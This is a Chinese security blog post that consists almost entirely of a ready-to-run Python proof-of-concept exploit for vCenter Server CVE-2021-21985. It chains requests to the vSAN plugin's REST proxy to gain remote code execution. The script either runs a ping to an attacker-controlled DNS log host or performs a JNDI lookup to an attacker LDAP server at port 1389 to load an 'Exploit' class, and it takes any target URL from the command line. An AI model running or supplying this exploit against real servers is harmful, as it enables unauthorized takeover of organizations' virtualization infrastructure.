vCenter Server CVE-2021-21985 POC

作者: print("") 分类: 信息安全 发布时间: 2021-06-18 14:12

import requests
import json
import sys

#python CVE-2021-21985.py https://test.com/ xx.dnslog.cn 2

url = sys.argv[1]
dns = sys.argv[2]
exp = sys.argv[3]

header = {'Content-Type':'application/json','User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0'}
cookie = {}
requests.packages.urllib3.disable_warnings()

def step1(url):
    urls = url+'/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVsanServiceFactory/setTargetObject'
    data = {"methodInput":[None]}
    r = requests.post(url=urls,data=json.dumps(data),headers=header,cookies=cookie,verify=False)
    if r.text == '{"result":null}':
        print('step1 success')
        step2(url,exp)
    else :
        print('step1 error')

def step2(url,exp):
    urls = url+'/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setStaticMethod'
    data = {"methodInput":["java.lang.ProcessImpl.start"]} if exp == 1  else {"methodInput":["javax.naming.InitialContext.doLookup"]}
    r = requests.post(url=urls,data=json.dumps(data),headers=header,cookies=cookie,verify=False)
    if r.text == '{"result":null}':
        print('step2 success')
        step3(url,exp)
    else :
        print('step2 error')

def step3(url,exp):
    urls = url+'/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setTargetMethod'
    data = {"methodInput":["start"]} if exp == 1 else {"methodInput":["doLookup"]}
    r = requests.post(url=urls,data=json.dumps(data),headers=header,cookies=cookie,verify=False)
    if r.text == '{"result":null}':
        print('step3 success')
        step4(url,dns,exp)
    else :
        print('step3 error')

def step4(url,dns,exp):
    urls = url+'/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setArguments'
    data = {"methodInput":[[["ping",dns],None,".",None,True]]} if exp == 1 else {"methodInput":[["ldap://"+dns+":1389/Exploit"]]}
    r = requests.post(url=urls,data=json.dumps(data),headers=header,cookies=cookie,verify=False)
    if r.text == '{"result":null}':
        print('step4 success')
        step5(url)
    else :
        print('step4 error')

def step5(url):
    urls = url+'/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/prepare'
    data = {"methodInput":[]}
    r = requests.post(url=urls,data=json.dumps(data),headers=header,cookies=cookie,verify=False)
    if r.text == '{"result":null}':
        print('step5 success')
        step6(url)
    else :
        print('step5 error')

def step6(url):
    urls = url+'/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/invoke'
    data = {"methodInput":[]}
    r = requests.post(url=urls,data=json.dumps(data),headers=header,cookies=cookie,verify=False,timeout=5)
    print('step6 success')

step1(url)

参考文章:https://mp.weixin.qq.com/s/KYG76IbR6PRs8PjrNDyVkQ

https://mp.weixin.qq.com/s/Hg67l1C-XWNzwFWF-CLh7A

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注